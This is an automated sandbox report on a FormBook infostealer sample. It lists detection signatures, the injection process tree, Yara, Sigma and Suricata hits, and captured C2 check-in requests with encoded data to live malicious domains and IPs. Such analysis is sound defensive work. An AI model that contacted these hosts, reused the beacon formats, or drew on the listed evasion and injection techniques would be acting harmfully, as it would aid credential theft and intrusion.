Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
aBEh0fsi2c.exe

Overview

General Information

Sample name:aBEh0fsi2c.exe
renamed because original name is a hash value
Original sample name:9351f03cc5e661bf7eb9e279c67c11f05ea78c2cc6c283691218ab43c3e15a06.exe
Analysis ID:1588004
MD5:ae1fe8e567226c914dc9a747e25d2118
SHA1:70db43d604ed9a6da5afb4982d2f0cca238632bd
SHA256:9351f03cc5e661bf7eb9e279c67c11f05ea78c2cc6c283691218ab43c3e15a06
Tags:exeuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Suspicious Process Parents
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • aBEh0fsi2c.exe (PID: 8096 cmdline: "C:\Users\user\Desktop\aBEh0fsi2c.exe" MD5: AE1FE8E567226C914DC9A747E25D2118)
    • svchost.exe (PID: 7216 cmdline: "C:\Users\user\Desktop\aBEh0fsi2c.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • XWDsAjkFcK.exe (PID: 6920 cmdline: "C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • winver.exe (PID: 6036 cmdline: "C:\Windows\SysWOW64\winver.exe" MD5: B5471B0FB5402FC318C82C994C6BF84D)
          • XWDsAjkFcK.exe (PID: 6544 cmdline: "C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5920 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000006.00000002.2560990702.0000000005330000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.1674836566.0000000006DE0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000005.00000002.2556881599.0000000004780000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000005.00000002.2556809285.0000000004730000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000002.00000002.1671761694.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe" , CommandLine: "C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe, NewProcessName: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe, OriginalFileName: C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe, ParentCommandLine: "C:\Windows\SysWOW64\winver.exe", ParentImage: C:\Windows\SysWOW64\winver.exe, ParentProcessId: 6036, ParentProcessName: winver.exe, ProcessCommandLine: "C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe" , ProcessId: 6544, ProcessName: XWDsAjkFcK.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\aBEh0fsi2c.exe", CommandLine: "C:\Users\user\Desktop\aBEh0fsi2c.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\aBEh0fsi2c.exe", ParentImage: C:\Users\user\Desktop\aBEh0fsi2c.exe, ParentProcessId: 8096, ParentProcessName: aBEh0fsi2c.exe, ProcessCommandLine: "C:\Users\user\Desktop\aBEh0fsi2c.exe", ProcessId: 7216, ProcessName: svchost.exe
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\aBEh0fsi2c.exe", CommandLine: "C:\Users\user\Desktop\aBEh0fsi2c.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\aBEh0fsi2c.exe", ParentImage: C:\Users\user\Desktop\aBEh0fsi2c.exe, ParentProcessId: 8096, ParentProcessName: aBEh0fsi2c.exe, ProcessCommandLine: "C:\Users\user\Desktop\aBEh0fsi2c.exe", ProcessId: 7216, ProcessName: svchost.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-10T20:27:05.356151+010028554651A Network Trojan was detected192.168.2.1049974154.90.58.20980TCP
                2025-01-10T20:27:30.033407+010028554651A Network Trojan was detected192.168.2.104997947.76.213.19780TCP
                2025-01-10T20:27:43.729058+010028554651A Network Trojan was detected192.168.2.104998374.48.143.8280TCP
                2025-01-10T20:27:56.899908+010028554651A Network Trojan was detected192.168.2.104998713.248.169.4880TCP
                2025-01-10T20:28:11.290150+010028554651A Network Trojan was detected192.168.2.1049991103.21.221.8780TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-10T20:27:22.934808+010028554641A Network Trojan was detected192.168.2.104997647.76.213.19780TCP
                2025-01-10T20:27:24.879333+010028554641A Network Trojan was detected192.168.2.104997747.76.213.19780TCP
                2025-01-10T20:27:27.631097+010028554641A Network Trojan was detected192.168.2.104997847.76.213.19780TCP
                2025-01-10T20:27:36.087507+010028554641A Network Trojan was detected192.168.2.104998074.48.143.8280TCP
                2025-01-10T20:27:38.639796+010028554641A Network Trojan was detected192.168.2.104998174.48.143.8280TCP
                2025-01-10T20:27:41.215893+010028554641A Network Trojan was detected192.168.2.104998274.48.143.8280TCP
                2025-01-10T20:27:50.294439+010028554641A Network Trojan was detected192.168.2.104998413.248.169.4880TCP
                2025-01-10T20:27:51.777235+010028554641A Network Trojan was detected192.168.2.104998513.248.169.4880TCP
                2025-01-10T20:27:54.325725+010028554641A Network Trojan was detected192.168.2.104998613.248.169.4880TCP
                2025-01-10T20:28:03.102177+010028554641A Network Trojan was detected192.168.2.1049988103.21.221.8780TCP
                2025-01-10T20:28:05.835980+010028554641A Network Trojan was detected192.168.2.1049989103.21.221.8780TCP
                2025-01-10T20:28:08.393691+010028554641A Network Trojan was detected192.168.2.1049990103.21.221.8780TCP
                2025-01-10T20:28:19.527236+010028554641A Network Trojan was detected192.168.2.10499928.218.14.12080TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: aBEh0fsi2c.exeVirustotal: Detection: 31%Perma Link
                Source: aBEh0fsi2c.exeReversingLabs: Detection: 76%
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.2560990702.0000000005330000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1674836566.0000000006DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2556881599.0000000004780000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2556809285.0000000004730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1671761694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2548849880.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1672439477.0000000003D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2558324040.0000000002C80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: aBEh0fsi2c.exeJoe Sandbox ML: detected
                Source: aBEh0fsi2c.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: winver.pdb source: svchost.exe, 00000002.00000002.1671996671.0000000003412000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1640761288.000000000342B000.00000004.00000020.00020000.00000000.sdmp, XWDsAjkFcK.exe, 00000004.00000002.2555308027.0000000000F98000.00000004.00000020.00020000.00000000.sdmp, XWDsAjkFcK.exe, 00000004.00000003.1624240262.0000000000FAB000.00000004.00000001.00020000.00000000.sdmp, XWDsAjkFcK.exe, 00000004.00000002.2555308027.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: XWDsAjkFcK.exe, 00000004.00000002.2548851563.00000000008DE000.00000002.00000001.01000000.00000006.sdmp, XWDsAjkFcK.exe, 00000006.00000000.1743900413.00000000008DE000.00000002.00000001.01000000.00000006.sdmp
                Source: Binary string: wntdll.pdbUGP source: aBEh0fsi2c.exe, 00000000.00000003.1335331677.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, aBEh0fsi2c.exe, 00000000.00000003.1334580447.0000000003800000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1578263375.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1576493347.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1672085279.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1672085279.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000005.00000003.1674367752.00000000049A4000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000005.00000002.2558802002.0000000004CEE000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000005.00000002.2558802002.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000005.00000003.1672094070.00000000047FC000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: aBEh0fsi2c.exe, 00000000.00000003.1335331677.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, aBEh0fsi2c.exe, 00000000.00000003.1334580447.0000000003800000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1578263375.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1576493347.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1672085279.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1672085279.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000005.00000003.1674367752.00000000049A4000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000005.00000002.2558802002.0000000004CEE000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000005.00000002.2558802002.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000005.00000003.1672094070.00000000047FC000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: winver.pdbGCTL source: svchost.exe, 00000002.00000002.1671996671.0000000003412000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1640761288.000000000342B000.00000004.00000020.00020000.00000000.sdmp, XWDsAjkFcK.exe, 00000004.00000002.2555308027.0000000000F98000.00000004.00000020.00020000.00000000.sdmp, XWDsAjkFcK.exe, 00000004.00000003.1624240262.0000000000FAB000.00000004.00000001.00020000.00000000.sdmp, XWDsAjkFcK.exe, 00000004.00000002.2555308027.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003C445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_003C445A
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003CC6D1 FindFirstFileW,FindClose,0_2_003CC6D1
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003CC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_003CC75C
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003CEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_003CEF95
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003CF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_003CF0F2
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003CF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_003CF3F3
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003C37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_003C37EF
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003C3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_003C3B12
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003CBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_003CBCBC

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49974 -> 154.90.58.209:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49976 -> 47.76.213.197:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49990 -> 103.21.221.87:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49985 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49991 -> 103.21.221.87:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49989 -> 103.21.221.87:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49980 -> 74.48.143.82:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49981 -> 74.48.143.82:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49987 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49982 -> 74.48.143.82:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49979 -> 47.76.213.197:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49978 -> 47.76.213.197:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49992 -> 8.218.14.120:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49986 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49977 -> 47.76.213.197:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49988 -> 103.21.221.87:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49984 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49983 -> 74.48.143.82:80
                Source: DNS query: www.fortevision.xyz
                Source: DNS query: www.rtpterbaruwaktu3.xyz
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewIP Address: 103.21.221.87 103.21.221.87
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: Joe Sandbox ViewASN Name: LINKNET-ID-APLinknetASNID LINKNET-ID-APLinknetASNID
                Source: Joe Sandbox ViewASN Name: CNSERVERSUS CNSERVERSUS
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\aBEh0fsi2c.exeCode function: 0_2_003D22EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_003D22EE
                Source: global trafficHTTP traffic detected: GET /z9pi/?KzB47nV=ied+cptg7UakpzhN9du5VSsdJmGTMgTej64IZr/ehzcWgm5THakcORsiVprqoW37b/eRnRq1Qh5X/LbXYJipglwHgduUeSBeuMCINCfMt0kyQ8gS8A==&ity41=G4jxKXr HTTP/1.1Host: www.jijievo.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /8qt7/?KzB47nV=FpCuTMU+yGtduI5RRmSeut/xWTwd9fsLSpRJwwRFNKDd6qo9VMAnWwDYglhkdC4Vi65aP7UQN4CBUilkwxZXspxWYm91P5vgQDerxUIIQwwTsV+rYA==&ity41=G4jxKXr HTTP/1.1Host: www.ytsd88.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /mlxg/?KzB47nV=cQzZIkxePH03UbtQeBzk4injmTvYH6638l8io/jKjoXZ1YEXRx5ntf5pTkNOcA/fsinJED0Fc0Ua6QV4aMGrU+dJXjaTCQaUtQq1o15v4dK3n1/iEQ==&ity41=G4jxKXr HTTP/1.1Host: www.bpgroup.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /dash/?ity41=G4jxKXr&KzB47nV=YMHBudoHIUxH+uWLZqjBWOOezInCz6AkcjAI4kujT8yqZMh8PwdCYhUcXF8Hm7NuwJrkm81K0kAXhGwUtx1Q7rAgUq2fct0m2tHm8/896FICvJPjzg== HTTP/1.1Host: www.fortevision.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /mv7p/?KzB47nV=5Xkb80UCbQYKeySJYU53mvY68yMkCwQR8td5rEUSu2Sur2yiMTlgkW/d3b9rVTV1/KKKFkoFavUE13Uu3OCOJqQPM7lgRIPKEXKG9BUPo7IhW8nQqw==&ity41=G4jxKXr HTTP/1.1Host: www.rtpterbaruwaktu3.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.grandesofertas.fun
                Source: global trafficDNS traffic detected: DNS query: www.jijievo.site
                Source: global trafficDNS traffic detected: DNS query: www.ytsd88.top
                Source: global trafficDNS traffic detected: DNS query: www.bpgroup.site
                Source: global trafficDNS traffic detected: DNS query: www.fortevision.xyz
                Source: global trafficDNS traffic detected: DNS query: www.rtpterbaruwaktu3.xyz
                Source: global trafficDNS traffic detected: DNS query: www.prhmcjdz.tokyo
                Source: unknownHTTP traffic detected: POST /8qt7/ HTTP/1.1Host: www.ytsd88.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateOrigin: http://www.ytsd88.topReferer: http://www.ytsd88.top/8qt7/Content-Type: application/x-www-form-urlencodedConnection: closeCache-Control: no-cacheContent-Length: 196User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36Data Raw: 4b 7a 42 34 37 6e 56 3d 49 72 71 4f 51 36 78 65 37 33 49 49 6a 4a 35 47 4f 77 79 67 74 72 66 53 59 47 51 6e 2f 72 46 61 4c 37 6b 71 6b 68 42 71 63 5a 36 43 39 62 31 44 65 59 45 6d 4b 44 66 52 75 79 63 32 57 77 45 67 76 37 46 6b 65 39 6b 5a 4a 6f 75 62 4c 47 5a 69 7a 6d 30 51 6a 4c 64 68 58 58 55 33 4e 49 62 45 51 53 47 51 6b 46 5a 66 61 55 34 66 6d 45 66 64 4d 58 49 6b 4a 53 50 42 5a 41 6b 42 56 4a 2b 4a 44 6e 4f 32 2b 4e 49 67 64 79 37 47 4c 4e 5a 46 54 74 4f 6a 2b 73 39 72 51 48 57 51 6e 42 36 66 66 4f 43 65 42 58 2f 51 4b 62 33 66 79 70 48 4d 4b 43 75 50 53 2f 56 59 37 55 34 72 Data Ascii: KzB47nV=IrqOQ6xe73IIjJ5GOwygtrfSYGQn/rFaL7kqkhBqcZ6C9b1DeYEmKDfRuyc2WwEgv7Fke9kZJoubLGZizm0QjLdhXXU3NIbEQSGQkFZfaU4fmEfdMXIkJSPBZAkBVJ+JDnO2+NIgdy7GLNZFTtOj+s9rQHWQnB6ffOCeBX/QKb3fypHMKCuPS/VY7U4r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 19:27:24 GMTContent-Type: text/htmlContent-Length: 409Connection: closeETag: "66d016cf-199"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 85 8d e8 b4 b9 ef bc 8c e9 ab 98 e6 95 88 e5 92 8c e5 ae 89 e5 85 a8 e7 9a 84 e6 89 98 e7 ae a1 e6 8e a7 e5 88 b6 e9 9d a2 e6 9d bf 29 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>
